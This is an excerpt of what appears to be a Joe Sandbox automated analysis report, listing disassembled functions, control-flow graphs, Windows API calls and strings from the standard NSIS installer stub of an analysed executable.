                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                  • String ID: jF
                                                                                                                                                                                                                                                                  • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                  Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                  • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                  • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                  Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                  Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                    • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                  • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                  • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                  • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
